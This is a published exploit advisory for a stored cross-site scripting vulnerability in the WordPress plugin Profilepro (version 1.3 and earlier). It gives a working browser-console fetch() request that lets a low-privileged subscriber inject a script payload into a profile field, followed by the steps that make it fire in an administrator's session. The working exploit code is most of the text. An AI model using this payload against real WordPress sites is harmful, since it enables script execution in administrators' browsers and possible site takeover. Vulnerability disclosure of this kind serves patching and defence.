WordPress Profilepro 1.3 Cross Site Scripting

# Exploit Title: profilepro <= 1.3 - Subscriber+ Stored Cross Site Scripting# Date: 15-04-2024# Exploit Author: Vuln Seeker Cybersecurity Team# Vendor Homepage: https://wordpress.org/plugins/profilepro/# Version: <= 1.3# Tested on: Firefox# Contact me: [email protected] plugin does not sanitise and escape some parameters and lacks properaccess controls, which could allow users with a role as low as subscriberto perform Cross-Site Scripting attacksProof of ConceptRun the following code from the browser console from the subscriber user```fetch("../wp-admin/admin-ajax.php", {  method: "POST",  headers: {    "Accept": "*/*",    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",    "X-Requested-With": "XMLHttpRequest"  },  body:"title=%22%3E%3Cscript%3Ealert(1339)%3C%2Fscript%3E&label=&meta_key=&placeholder=&help_text=&privacy=1&max_length=&is_required=1&user_edit=1&icon=&type=textarea&action=profilepro_admin_add_custom_field&arg2=89",  credentials: "include"}).then(response => {  if (!response.ok) {    throw new Error('Network response was not ok');  }  return response.text();}).then(data => console.log(data)).catch(error => console.error('Error:', error));```- As an admin, go tohttp://example.com/wp-admin/edit.php?post_type=profilepro_form- Choose the default profile, click on edit and click on add field, XSSwill pop up.Reference:https://wpscan.com/vulnerability/8faf1409-44e6-4ebf-9a68-b5f93a5295e9/